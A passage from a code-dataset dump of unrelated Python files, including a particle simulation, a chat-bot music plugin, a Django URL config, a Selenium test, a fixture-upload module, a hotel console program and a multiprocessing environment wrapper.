= (uy[i, j] * time_step) + (0.5 * acc_y[i, j] * time_step * time_step)\r\n vx[i, j] = ux[i, j] + (acc_x[i, j] * time_step)\r\n vy[i, j] = uy[i, j] + (acc_y[i, j] * time_step)\r\n if (X[i] - X[j]) ** 2 + (Y[i] - Y[j]) ** 2 <= 2:\r\n if i <= j:\r\n tempx = vx[i]\r\n tempy = vy[i]\r\n vx[i] = ((M[i] - M[j]) / (M[i] + M[j])) * vx[i] + (2 * M[j] / (M[i] + M[j])) * vx[j]\r\n vy[i] = ((M[i] - M[j]) / (M[i] + M[j])) * vy[i] + (2 * M[j] / (M[i] + M[j])) * vy[j]\r\n vx[j] = ((M[j] - M[i]) / (M[j] + M[i])) * vx[j] + (2 * M[i] / (M[j] + M[i])) * tempx\r\n vy[j] = ((M[j] - M[i]) / (M[j] + M[i])) * vy[j] + (2 * M[i] / (M[j] + M[i])) * tempy\r\n\r\n ux = vx.copy()\r\n uy = vy.copy()\r\n\r\n for i in range(n):\r\n X[i] = X[i]+np.sum(sx[i, :])\r\n Y[i] = Y[i] + np.sum(sy[i, :])\r\n if X[i] > x_lim:\r\n X[i] = X[i] - x_lim\r\n if X[i] < 0:\r\n X[i] = x_lim - X[i]\r\n if Y[i] > y_lim:\r\n Y[i] = Y[i] - y_lim\r\n if Y[i] < 0:\r\n Y[i] = y_lim - Y[i]\r\n\r\n Xt[:, z] = X\r\n Yt[:, z] = Y\r\n\r\n t = t + time_step\r\n\r\n plt.scatter(X, Y, s=s, color='black')\r\n plt.xlim([0, 1000])\r\n plt.ylim([0, 1000])\r\n plt.axis('off')\r\n filename = 'frame' + str(status) + '.png'\r\n # sys.stdout.flush()\r\n plt.savefig(filename)\r\n plt.close()\r\n\r\n\r\n","sub_path":"min1.py","file_name":"min1.py","file_ext":"py","file_size_in_byte":4597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"536122017","text":"\"\"\"Play music from stormbot\"\"\"\nimport os\nimport subprocess\nfrom .bot import Plugin\n\n\nclass Music(Plugin):\n def __init__(self, args):\n self.player = args.music_player\n self.path = os.path.abspath(args.music_path)\n self.default = args.music_default\n\n @classmethod\n def argparse(cls, parser):\n parser.add_argument(\"--music-player\", type=str, 
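# --- Editor's note (illustrative sketch, not part of the original dataset) ---
# The min1.py record above computes pairwise gravity with nested O(n^2) Python
# loops over angles and force components. Below is a minimal vectorized NumPy
# sketch of the same force step; the function and parameter names (positions,
# masses, softening) are assumptions introduced here, not identifiers from the
# original script.
import numpy as np

def pairwise_gravity_acc(positions, masses, G=1000.0, softening=1.0):
    """Per-particle accelerations for 2-D positions of shape (n, 2)."""
    # diff[i, j] = positions[j] - positions[i] for every particle pair
    diff = positions[None, :, :] - positions[:, None, :]
    # squared distances, softened so coincident particles cannot divide by zero
    r2 = (diff ** 2).sum(axis=-1) + softening ** 2
    np.fill_diagonal(r2, np.inf)  # no self-interaction
    inv_r3 = r2 ** -1.5
    # a_i = G * sum_j m_j * (r_j - r_i) / |r_j - r_i|^3
    return G * (diff * (masses[None, :, None] * inv_r3[:, :, None])).sum(axis=1)

rng = np.random.default_rng(0)
pos = 1000.0 * rng.random((100, 2))
m = 2.0 * rng.uniform(0.1, 1.0, size=100)
print(pairwise_gravity_acc(pos, m).shape)  # (100, 2)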
default=\"paplay\", help=\"Music player (default: %(default)s)\")\n parser.add_argument(\"--music-path\", type=str, default=os.getcwd(), help=\"Music path (default: %(default)s)\")\n parser.add_argument(\"--music-default\", type=str, default=None, help=\"Default music to play (default: %(default)s)\")\n\n def safe_path(self, path):\n path = os.path.join(self.path, path)\n path = os.path.abspath(path)\n common_prefix = os.path.commonpath([path, self.path])\n return common_prefix == self.path\n\n def parser(self, parser):\n subparser = parser.add_parser('music')\n subparser.set_defaults(command=self.run)\n subparser.add_argument(\"--volume\", type=int, default=65536, help=\"Music player volume (default: %(default)i)\")\n subparser.add_argument(\"music\", type=str, nargs='?', default=self.default,\n help=\"Music to play (default: %(default)s)\")\n\n def run(self, bot, msg, parser, args):\n if not self.safe_path(args.music):\n bot.send_message(mto=msg['from'].bare, mbody=\"Don't try to mess with me !\", mtype='groupchat')\n return\n\n bot.send_message(mto=msg['from'].bare, mbody=\"playing your favorite song out loud !\", mtype='groupchat')\n music = os.path.join(self.path, args.music)\n cmd = [self.player, music]\n subprocess.Popen(cmd, stdin=None, stdout=None, stderr=None, close_fds=True)\n","sub_path":"stormbot/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"108115129","text":"from datetime import date\nimport sys\nimport json\n\nfrom tokenizer import tokenize, queryKey\nfrom constants import *\nimport schema\n\ndef addItemInfo(key, value, arr):\n if not value:\n arr.append(None)\n return\n\n name, color, itemVal, *_ = value.split('|')\n # itemLink format: itemName#|cffCOLOR_RGB|Hitem:itemId:....|\n itemObject = schema.ItemInfo(itemVal.split(':')[1], name[:-1], color[3:])\n arr.append(itemObject)\n\ndef main():\n if len(sys.argv) <= 1:\n return\n\n with open(sys.argv[1]) as f:\n content = f.read()\n with open(\"items.json\", 'w') as writer:\n result = queryKey(content, ('account', 'items'), addItemInfo)\n if not result:\n return\n writer.write(json.dumps(result, default=vars))\n\nmain()\n","sub_path":"parser/itemInfo.py","file_name":"itemInfo.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"18054944","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport os\nimport sys\nimport h5py\nimport numpy as np\nfrom scipy import stats\nimport matplotlib as mpl\n\nmpl.use(\"pgf\")\n\nfrom pgf_style import pgf_with_rc_fonts\n\nmpl.rcParams.update(pgf_with_rc_fonts)\n\nimport matplotlib.pyplot as plt\n\n\ndef draw(input_file_name, height, absorption_image,\n differential_phase_image,\n dark_field_image, fmt=\"pgf\"):\n \"\"\"Display the calculated images with matplotlib.\"\"\"\n absorption_image_title = \"assorbimento\"\n differential_phase_image_title = \"fase differenziale\"\n dark_field_image_title = \"riduzione di visibilit\\\\`a\"\n f, (ax1, ax2, ax3) = plt.subplots(\n 3, 1, sharex=True, figsize=(4.6, height), dpi=300)\n img1 = ax1.imshow(absorption_image,\n cmap=plt.cm.Greys, aspect='auto')\n limits = stats.mstats.mquantiles(absorption_image,\n prob=[0.02, 0.98])\n img1.set_clim(*limits)\n ax1.axis(\"off\")\n ax1.set_title(absorption_image_title, size=\"medium\")\n img2 = ax2.imshow(differential_phase_image)\n limits = stats.mstats.mquantiles(differential_phase_image,\n 
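# --- Editor's note (illustrative sketch, not part of the original dataset) ---
# The stormbot music.py record above guards against directory traversal with
# os.path.commonpath before playing a user-supplied file. A self-contained
# sketch of the same check; the function name and example paths are
# assumptions introduced here.
import os

def is_within(base, user_supplied):
    """True when user_supplied resolves inside base (rejects '../' escapes)."""
    base = os.path.abspath(base)
    candidate = os.path.abspath(os.path.join(base, user_supplied))
    return os.path.commonpath([candidate, base]) == base

print(is_within("/srv/music", "album/track.ogg"))   # True
print(is_within("/srv/music", "../../etc/passwd"))  # False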
prob=[0.02, 0.98])\n img2.set_clim(*limits)\n ax2.axis(\"off\")\n ax2.set_title(differential_phase_image_title, size=\"medium\")\n img3 = ax3.imshow(dark_field_image)\n ax3.set_title(dark_field_image_title, size=\"medium\")\n ax3.axis(\"off\")\n limits = stats.mstats.mquantiles(dark_field_image,\n prob=[0.02, 0.98])\n img3.set_clim(*limits)\n plt.tight_layout()\n if absorption_image.shape[0] == 1:\n f, (hist1, hist2, hist3) = plt.subplots(\n 3, 1, sharex=True)\n hist1.hist(range(absorption_image.shape[1]),\n weights=absorption_image.T, fc='w', ec='k')\n hist1.set_title(\"absorption\")\n hist2.hist(range(differential_phase_image.shape[1]),\n weights=differential_phase_image.T, fc='w', ec='k')\n hist2.set_title(\"differential phase\")\n hist3.hist(range(dark_field_image.shape[1]),\n bins=dark_field_image.shape[1],\n weights=dark_field_image.T, fc='w', ec='k')\n hist3.set_title(\"visibility reduction\")\n plt.tight_layout()\n plt.savefig('images_{0}.{1}'.format(\n os.path.splitext(os.path.basename(input_file_name))[0], fmt), dpi=300)\n\nif __name__ == '__main__':\n input_file_name = sys.argv[1]\n height = float(sys.argv[2])\n\n if not os.path.exists(input_file_name):\n raise(OSError(\"{0} not found\".format(input_file_name)))\n\n input_file = h5py.File(input_file_name, \"r\")\n absorption_image_name = \"postprocessing/absorption\"\n differential_phase_image_name = \"postprocessing/differential_phase\"\n visibility_reduction_image_name = \"postprocessing/visibility_reduction\"\n\n absorption_image = input_file[absorption_image_name]\n differential_phase_image = input_file[differential_phase_image_name]\n visibility_reduction_image = input_file[visibility_reduction_image_name]\n\n draw(input_file_name, height, absorption_image,\n differential_phase_image, visibility_reduction_image)\n","sub_path":"images/plot_images.py","file_name":"plot_images.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"221919135","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom blog.feeds import AllArticlesRssFeed\n\n\nurlpatterns = [\n path('', include('blog.urls')),\n path('', include('comment.urls')),\n path('admin/', admin.site.urls),\n path('feeds/', AllArticlesRssFeed(), name='rss'),\n path('search/', include('haystack.urls')),\n path('accounts/', include('allauth.urls')),\n]\n","sub_path":"mydjangoblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"488598364","text":"\n\nfrom xai.brain.wordbase.nouns._roan import _ROAN\n\n#calss header\nclass _ROANS(_ROAN, ):\n\tdef __init__(self,): \n\t\t_ROAN.__init__(self)\n\t\tself.name = \"ROANS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"roan\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_roans.py","file_name":"_roans.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"357077486","text":"'''\nCreated on 30-Nov-2015\n\n@author: radhika.goel\n'''\nimport unittest\nfrom selenium import webdriver\nclass SearchTests(unittest.TestCase):\n \n def setUp(self):\n # create a new Firefox session\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(30)\n self.driver.maximize_window()\n # navigate to the application home page\n self.driver.get(\"http://demo.magentocommerce.com/\")\n \n def 
test_search_by_category(self):\n # get the search textbox\n self.search_field = self.driver.find_element_by_xpath(\"//div[@id=\\\"ab-search\\\"]\")\n self.search_field.clear()\n #//div[@id=\\\"Navigation\\\"]/descendant::span[text()='Matrices']\n # enter search keyword and submit\n self.search_field.send_keys(\"Mobile Phones\")\n self.search_field.submit()\n \n # find_elements_by_xpath returns a list, which has no submit(); locate the\n # single theme link and click it instead\n self.phones = self.driver.find_element_by_xpath(\"//a[@href=\\\"http://www.magentocommerce.com/magento-connect/mobile-phones-responsive-theme-for-computers-electronics-mobile-stores.html\\\"]\")\n self.phones.click()\n \n \n def tearDown(self):\n self.driver.quit()\n \nif __name__ == '__main__':\n unittest.main(verbosity=2)","sub_path":"PyWork/UnitTestFrameworkWithSelenium/src/test/searchCategory.py","file_name":"searchCategory.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"449702345","text":"from couchdbkit import ResourceNotFound\nfrom django.core.exceptions import ValidationError\nfrom django.utils.translation import ugettext as _\nfrom corehq.apps.fixtures.exceptions import ExcelMalformatException, FixtureUploadError, \\\n FixtureAPIException, DuplicateFixtureTagException\nfrom corehq.apps.fixtures.models import FixtureDataType, FieldList, FixtureItemField, \\\n FixtureDataItem\nfrom corehq.apps.fixtures.utils import get_fields_without_attributes\nfrom corehq.util.soft_assert import soft_assert\nfrom corehq.util.spreadsheets.excel import WorksheetNotFound\nfrom .upload import DELETE_HEADER, FixtureUploadResult, \\\n get_memoized_location, FAILURE_MESSAGES, get_workbook\nfrom corehq.apps.users.models import CommCareUser\nfrom corehq.apps.users.util import normalize_username\nfrom dimagi.utils.couch.bulk import CouchTransaction\nfrom soil import DownloadBase\n\n\ndef run_upload(domain, workbook, replace=False, task=None):\n from corehq.apps.users.bulkupload import GroupMemoizer\n return_val = FixtureUploadResult()\n group_memoizer = GroupMemoizer(domain)\n get_location = get_memoized_location(domain)\n\n with CouchTransaction() as transaction:\n type_sheets = workbook.get_all_type_sheets()\n total_tables = len(type_sheets)\n return_val.number_of_fixtures = total_tables\n\n def _update_progress(table_count, item_count, items_in_table):\n if task:\n processed = table_count * 10 + (10. * item_count / items_in_table)\n DownloadBase.set_progress(task, processed, 10 * total_tables)\n\n for table_number, table_def in enumerate(type_sheets):\n tag = table_def.table_id\n new_data_type = FixtureDataType(\n domain=domain,\n is_global=table_def.is_global,\n tag=tag,\n fields=table_def.fields,\n item_attributes=table_def.item_attributes\n )\n try:\n tagged_fdt = FixtureDataType.fixture_tag_exists(domain, tag)\n if tagged_fdt:\n data_type = tagged_fdt\n # support old usage with 'UID'\n elif table_def.uid:\n data_type = FixtureDataType.get(table_def.uid)\n else:\n data_type = new_data_type\n\n if replace and data_type != new_data_type:\n data_type.recursive_delete(transaction)\n data_type = new_data_type\n\n data_type.fields = table_def.fields\n data_type.item_attributes = table_def.item_attributes\n data_type.is_global = table_def.is_global\n assert data_type.doc_type == FixtureDataType._doc_type\n if data_type.domain != domain:\n data_type = new_data_type\n return_val.errors.append(\n _(\"'%(UID)s' is not a valid UID. 
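# --- Editor's note (illustrative sketch, not part of the original dataset) ---
# The selenium test above relies on a global implicitly_wait(30). A common
# alternative is an explicit wait on the specific element; this sketch assumes
# the same selenium-3-era API the test uses, and reuses its URL and locator.
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

driver = webdriver.Firefox()
driver.get("http://demo.magentocommerce.com/")
try:
    # block up to 10 s until the search box is present, then interact with it
    search_field = WebDriverWait(driver, 10).until(
        EC.presence_of_element_located((By.XPATH, '//div[@id="ab-search"]')))
    search_field.send_keys("Mobile Phones")
    search_field.submit()
finally:
    driver.quit()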
But the new type is created.\")\n % {'UID': table_def.uid}\n )\n if table_def.delete:\n data_type.recursive_delete(transaction)\n continue\n except (ResourceNotFound, KeyError):\n data_type = new_data_type\n transaction.save(data_type)\n\n data_items = list(workbook.get_data_sheet(data_type.tag))\n items_in_table = len(data_items)\n for sort_key, di in enumerate(data_items):\n _update_progress(table_number, sort_key, items_in_table)\n type_fields = data_type.fields\n item_fields = {}\n for field in type_fields:\n # if field doesn't have properties\n if len(field.properties) == 0:\n item_fields[field.field_name] = FieldList(\n field_list=[FixtureItemField(\n # using unicode here, to cast ints, and multi-language strings\n field_value=unicode(di['field'][field.field_name]),\n properties={}\n )]\n )\n else:\n field_list = []\n field_prop_combos = di['field'][field.field_name]\n prop_combo_len = len(field_prop_combos)\n prop_dict = di[field.field_name]\n for x in range(0, prop_combo_len):\n fix_item_field = FixtureItemField(\n field_value=unicode(field_prop_combos[x]),\n properties={prop: unicode(prop_dict[prop][x]) for prop in prop_dict}\n )\n field_list.append(fix_item_field)\n item_fields[field.field_name] = FieldList(\n field_list=field_list\n )\n\n item_attributes = di.get('property', {})\n new_data_item = FixtureDataItem(\n domain=domain,\n data_type_id=data_type.get_id,\n fields=item_fields,\n item_attributes=item_attributes,\n sort_key=sort_key\n )\n try:\n if di['UID'] and not replace:\n old_data_item = FixtureDataItem.get(di['UID'])\n else:\n old_data_item = new_data_item\n pass\n old_data_item.fields = item_fields\n old_data_item.item_attributes = item_attributes\n if old_data_item.domain != domain \\\n or not old_data_item.data_type_id == data_type.get_id:\n old_data_item = new_data_item\n return_val.errors.append(\n _(\"'%(UID)s' is not a valid UID. But the new item is created.\")\n % {'UID': di['UID']}\n )\n assert old_data_item.doc_type == FixtureDataItem._doc_type\n if di[DELETE_HEADER] == \"Y\" or di[DELETE_HEADER] == \"y\":\n old_data_item.recursive_delete(transaction)\n continue\n except (ResourceNotFound, KeyError):\n old_data_item = new_data_item\n transaction.save(old_data_item)\n\n old_groups = old_data_item.groups\n for group in old_groups:\n old_data_item.remove_group(group)\n old_users = old_data_item.users\n for user in old_users:\n old_data_item.remove_user(user)\n old_locations = old_data_item.locations\n for location in old_locations:\n old_data_item.remove_location(location)\n\n for group_name in di.get('group', []):\n group = group_memoizer.by_name(group_name)\n if group:\n old_data_item.add_group(group, transaction=transaction)\n else:\n return_val.errors.append(\n _(\"Unknown group: '%(name)s'. But the row is successfully added\")\n % {'name': group_name}\n )\n\n for raw_username in di.get('user', []):\n try:\n username = normalize_username(str(raw_username), domain)\n except ValidationError:\n return_val.errors.append(\n _(\"Invalid username: '%(name)s'. Row is not added\")\n % {'name': raw_username}\n )\n continue\n user = CommCareUser.get_by_username(username)\n if user:\n old_data_item.add_user(user)\n else:\n return_val.errors.append(\n _(\"Unknown user: '%(name)s'. 
But the row is successfully added\")\n % {'name': raw_username}\n )\n\n for name in di.get('location', []):\n location_cache = get_location(name)\n if location_cache.is_error:\n return_val.errors.append(location_cache.message)\n else:\n old_data_item.add_location(location_cache.location,\n transaction=transaction)\n\n return return_val\n\n\ndef _diff_lists(list_a, list_b):\n set_a = set(list_a)\n set_b = set(list_b)\n not_in_b = set_a.difference(set_b)\n not_in_a = set_b.difference(set_a)\n return sorted(not_in_a), sorted(not_in_b)\n\n\ndef validate_fixture_upload(workbook):\n\n try:\n type_sheets = workbook.get_all_type_sheets()\n except DuplicateFixtureTagException as e:\n return [e.message]\n except ExcelMalformatException as e:\n return e.errors\n\n error_messages = []\n\n for table_number, table_def in enumerate(type_sheets):\n tag = table_def.table_id\n fields = table_def.fields\n item_attributes = table_def.item_attributes\n try:\n data_items = workbook.get_data_sheet(tag)\n except WorksheetNotFound:\n error_messages.append(_(FAILURE_MESSAGES['type_has_no_sheet']).format(type=tag))\n continue\n\n try:\n data_item = iter(data_items).next()\n except StopIteration:\n continue\n else:\n # Check that type definitions in 'types' sheet vs corresponding columns in the item-sheet MATCH\n item_fields_list = data_item['field'].keys() if 'field' in data_item else []\n not_in_sheet, not_in_types = _diff_lists(item_fields_list, get_fields_without_attributes(fields))\n for missing_field in not_in_sheet:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_no_field_column\"])\n .format(tag=tag, field=missing_field))\n for missing_field in not_in_types:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_extra_column\"])\n .format(tag=tag, field=missing_field))\n\n # check that this item has all the properties listed in its 'types' definition\n item_attributes_list = data_item['property'].keys() if 'property' in data_item else []\n not_in_sheet, not_in_types = _diff_lists(item_attributes_list, item_attributes)\n for missing_field in not_in_sheet:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_no_field_column\"])\n .format(tag=tag, field=missing_field))\n for missing_field in not_in_types:\n error_messages.append(\n _(FAILURE_MESSAGES[\"has_extra_column\"])\n .format(tag=tag, field=missing_field))\n\n # check that properties in 'types' sheet vs item-sheet MATCH\n for field in fields:\n if len(field.properties) > 0:\n sheet_props = data_item.get(field.field_name, {})\n if not isinstance(sheet_props, dict):\n error_messages.append(\n _(FAILURE_MESSAGES[\"invalid_field_syntax\"])\n .format(tag=tag, field=field.field_name))\n continue\n sheet_props_list = sheet_props.keys()\n type_props = field.properties\n not_in_sheet, not_in_types = _diff_lists(sheet_props_list, type_props)\n for missing_property in not_in_sheet:\n error_messages.append(\n _(FAILURE_MESSAGES[\"sheet_has_no_property\"])\n .format(tag=tag, property=missing_property, field=field.field_name))\n for missing_property in not_in_types:\n error_messages.append(\n _(FAILURE_MESSAGES[\"sheet_has_extra_property\"])\n .format(tag=tag, property=missing_property, field=field.field_name))\n # check that fields with properties are numbered\n if type(data_item['field'][field.field_name]) != list:\n error_messages.append(\n _(FAILURE_MESSAGES[\"invalid_field_with_property\"])\n .format(field=field.field_name))\n field_prop_len = len(data_item['field'][field.field_name])\n for prop in sheet_props:\n if type(sheet_props[prop]) != list:\n 
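# --- Editor's note (worked example, not part of the original dataset) ---
# Behaviour of the _diff_lists helper defined above (copied here so the
# example is self-contained): it returns (items only in list_b, items only in
# list_a), each sorted. The sample field names are invented for illustration.
def _diff_lists(list_a, list_b):
    set_a = set(list_a)
    set_b = set(list_b)
    not_in_b = set_a.difference(set_b)
    not_in_a = set_b.difference(set_a)
    return sorted(not_in_a), sorted(not_in_b)

not_in_sheet, not_in_types = _diff_lists(['name', 'age'], ['name', 'dob'])
print(not_in_sheet)  # ['dob'] -- declared in the type but absent from the sheet
print(not_in_types)  # ['age'] -- present in the sheet but not declared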
error_messages.append(\n _(FAILURE_MESSAGES[\"invalid_property\"])\n .format(field=field.field_name, prop=prop))\n if len(sheet_props[prop]) != field_prop_len:\n error_messages.append(\n _(FAILURE_MESSAGES[\"wrong_field_property_combos\"])\n .format(field=field.field_name, prop=prop))\n return error_messages\n\n\ndef do_fixture_upload(domain, file_ref, replace, task=None):\n workbook = get_workbook(file_ref.get_filename())\n try:\n return run_upload(domain, workbook, replace=replace, task=task)\n except WorksheetNotFound as e:\n raise FixtureUploadError(\n _(\"Workbook does not contain a sheet called '%(title)s'\")\n % {'title': e.title})\n except ExcelMalformatException as e:\n raise FixtureUploadError(\n _(\"Uploaded excel file has following formatting-problems: '%(e)s'\")\n % {'e': '\\n'.join(e.errors)})\n except FixtureAPIException as e:\n raise FixtureUploadError(unicode(e))\n except Exception:\n soft_assert('@'.join(['droberts', 'dimagi.com'])).call(\n False, 'Unknown fixture upload exception',\n {'filename': file_ref.get_filename()}\n )\n raise FixtureUploadError(_(\"Fixture upload failed for some reason and we have noted this failure. \"\n \"Please make sure the excel file is correctly formatted and try again.\"))\n\n\ndef safe_fixture_upload(domain, file_ref, replace, task=None):\n try:\n return do_fixture_upload(domain, file_ref, replace, task)\n except FixtureUploadError as e:\n result = FixtureUploadResult()\n result.success = False\n result.errors.append(unicode(e))\n return result\n","sub_path":"corehq/apps/fixtures/upload/run_upload.py","file_name":"run_upload.py","file_ext":"py","file_size_in_byte":14762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"174612641","text":"\n\n\nhotel = {\n '1': {\n '101': ['George Jefferson', 'Wheezy Jefferson'],\n '105':['Jon', 'Jonathan', 'Johnny'],\n },\n '2': {\n '237': ['Jack Torrance', 'Wendy Torrance'],\n },\n '3': {\n '333': ['Neo', 'Trinity', 'Morpheus']\n },\n '4': {\n '444': ['Mitchell', 'Morgan', 'Xander']\n },\n '5': {\n '533': ['Anne', 'James', 'Elliot', 'Jonathan']\n }\n}\n\n\ndef greeting():\n front_desk = input(\"Welcome to the Python Hotel.\\nWould you like to:\\n1. check-in \\n2. check out\\n3. list of guests\\n4. exit?\\n\")\n\n while front_desk == \"check in\" or front_desk == \"1\":\n floor = input(\"What is your floor number [1-5]? \")\n room = input(\"What is your room number? \")\n \n if hotel.get(floor) != None and hotel.get(floor).get(room) != None:\n print(\"That room is taken, please choose another room.\")\n \n else:\n print(\"Great, welcome to the hotel.\")\n occupants = int(input(\"How many occupants do you have? \"))\n count = 0\n occupant_list = []\n while count < occupants:\n names = input(str(count+1) + \" Occupant's Name: \")\n occupant_list.append(names)\n count+=1\n hotel[floor][room] = occupant_list\n print(hotel[floor][room])\n front_desk = None\n greeting()\n \n while front_desk == \"check out\" or front_desk == \"2\":\n floor = input(\"What is your floor number? \")\n room = input(\"What is your room number? 
\")\n if hotel.get(floor) != None and hotel.get(floor).get(room) != None:\n hotel[floor][room] = None\n print(\"\\nThank you for staying with us.\\n\")\n print(\"Floor \", floor,\"\\tRoom \", room,\":\\t\", hotel[floor][room], \"\\n\")\n #print(\"\\t\\t\\t\", hotel[floor][room])\n front_desk = None\n greeting()\n else:\n print(\"That room is not occupied, please enter your room number.\")\n\n if front_desk == \"list\" or front_desk == \"3\":\n list_criteria = input(\"Please enter a floor number or 'all' for all current guests: \")\n if list_criteria == 'all':\n print(\"Here's a list of our current guests:\")\n for key, value in hotel.items():\n indent = 0\n print(\"Floor \" + key + \":\")\n for values, names in value.items():\n if not names:\n continue # skip rooms already checked out (set to None above)\n print(\"\\t\\t\", \"Room: \", values)\n for name in names:\n print(\"\\t\\t\\t\", name)\n #print(\"\\t\\t\\t\" + names)\n front_desk = None\n greeting()\n else:\n print(\"Here's a list of our current guests on Floor \" + list_criteria + \":\")\n for key, value in hotel[list_criteria].items():\n if not value:\n continue # skip rooms already checked out (set to None above)\n print(\"\\t\", \"Room \", key)\n for names in value:\n print(\"\\t\\t\\t\", names)\n front_desk = None\n greeting()\n else:\n return\n \n\n \ngreeting()","sub_path":"hotel1.py","file_name":"hotel1.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"96688270","text":"\n# Checks the classification of the ab initio materials science methods, done by parser,\n# currently considers DFT XC treatment,\n# however extends it with the post-Hartree-Fock methods\n# Author: Evgeny Blokhin\n\n__order__ = 4\n\nxc_types = [ # see hierarchy values in the file init-data.sql\n 0x1, 0x2, 0x3, 0x4, # main types of the Jacob's ladder, http://dx.doi.org/10.1063/1.1904565\n 0x5, 0x6, 0x7, # Hartree-Fock, +U, vdW\n]\n\ndef classify(tilde_obj):\n for i in tilde_obj.info['H_types']:\n if not i in xc_types: raise RuntimeError(\"Unknown xc type: %s (maybe typo?)\" % i)\n\n return tilde_obj\n","sub_path":"tilde/classifiers/xc_treatment.py","file_name":"xc_treatment.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
+{"seq_id":"522015402","text":"# Vectorize the environment to enable multiprocessing the environment rollout\n# Try to increase training efficiency when the training is having a bottleneck in environment rollout\n# Code does not include the tensorflow graph: a separate algorithm is required to generate the action.\n# If not provided, it will use random action.\n# Source : https://github.com/openai/baselines/tree/master/baselines/a2c\n\n# This class is to run multiple environments at the same time.\n\nfrom multiprocessing import Process, Pipe\nimport numpy as np\n\ndef worker(remote, env_wrapper, map_size, policy_red):\n env = env_wrapper\n policy_red = policy_red\n map_size = map_size\n done = False # initialized so a 'step' arriving before the first 'reset' cannot raise NameError\n while True:\n cmd, data = remote.recv()\n if cmd == 'step':\n if done:\n remote.send((ob, reward, done))\n else:\n ob, reward, done, _ = env.step(data)\n #if done:\n # ob = env.reset(map_size=MAP_SIZE, policy_red=policy_red)\n ob = env._env # comment this line to make partial observable\n remote.send((ob, reward, done))\n elif cmd == 'reset':\n done = False\n ob = env.reset(map_size=map_size, policy_red=policy_red.PolicyGen(env.get_map, env.get_team_red))\n ob = env._env\n remote.send((ob, env.get_team_blue))\n elif cmd == 'close':\n remote.close()\n break\n elif cmd == 'won':\n remote.send(env.blue_win)\n elif cmd == 'render':\n pass\n elif cmd == 'renew':\n # 
renew weight of the policy\n # policy must support reset weight method\n policy_red.reset_network()\n elif cmd == 'change_red_policy':\n # Change policy of red with given data\n policy_red=data\n elif cmd == 'change_mapsize':\n # Change map_size\n map_size=data\n else:\n raise NotImplementedError\n\nclass SubprocVecEnv:\n # Subprocess Vector Environment\n # https://github.com/openai/baselines/tree/master/baselines/a2c (source)\n # with some modificatoins\n def __init__(self, nenvs, env_fns, map_size, initial_reds):\n self.nenvs = nenvs\n \n self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)])\n self.ps = [Process(target=worker, args=(self.work_remotes[idx], env_fns[idx], map_size, initial_reds[idx]))\n for idx in range(nenvs)]\n for pidx, p in enumerate(self.ps):\n p.start()\n print(f\"Process {pidx} Initiated\")\n\n def step(self, actions):\n for remote, action in zip(self.remotes, actions):\n remote.send(('step', action))\n results = [remote.recv() for remote in self.remotes]\n obs, rews, dones = zip(*results)\n return np.stack(obs), np.stack(rews), np.stack(dones)\n\n def reset(self):\n for remote in self.remotes:\n remote.send(('reset', None))\n results = [remote.recv() for remote in self.remotes]\n obs, team = zip(*results)\n return np.stack(obs), np.stack(team)\n \n def won(self):\n for remote in self.remotes:\n remote.send(('won', None))\n results = [remote.recv() for remote in self.remotes]\n return np.stack(results)\n\n def close(self):\n for remote in self.remotes:\n remote.send(('close', None))\n for p in self.ps:\n p.join()\n \n def change_red_policy(self, policy):\n for remote in self.remotes:\n remote.send(('change_red_policy', policy))\n \n def change_mapsize(self, ms):\n for remote in self.remotes:\n remote.send(('change_mapsize', ms))\n\n def render(self):\n for remote in self.remotes:\n remote.send(('render', None))\n\n @property\n def num_envs(self):\n return len(self.remotes)","sub_path":"utility/vectorEnv.py","file_name":"vectorEnv.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"240486022","text":"import os\nfrom errors.bundledoesnotexistserror import BundleDoesNotExistsError\n\nSLASH = \"/\"\nTEMPLATES = \"templates\"\nROOT_PATH = os.path.dirname(os.path.abspath(__file__)) + \"/../\"\nBUNDLES = \"bundles\"\nBUNDLE_LOCATION = \"/../bundles/\"\nBUNDLE_SETTINGS = \"/settings.py\"\nCONTROLLER_PATH = \"/controllers/\"\nCONTROLLER_TEMPLATE = \"controller.tem\"\nCONTROLLER_TEMPLATE_PATH = ROOT_PATH + TEMPLATES + SLASH + BUNDLES + SLASH + CONTROLLER_TEMPLATE\n\nclass ControllerManager(object):\n\n @classmethod\n def create(cls, controller_name, bundle_name):\n cls._create_controller_file(bundle_name, controller_name)\n cls._create_controller_setting(bundle_name, controller_name)\n\n @classmethod\n def _create_controller_setting(cls, 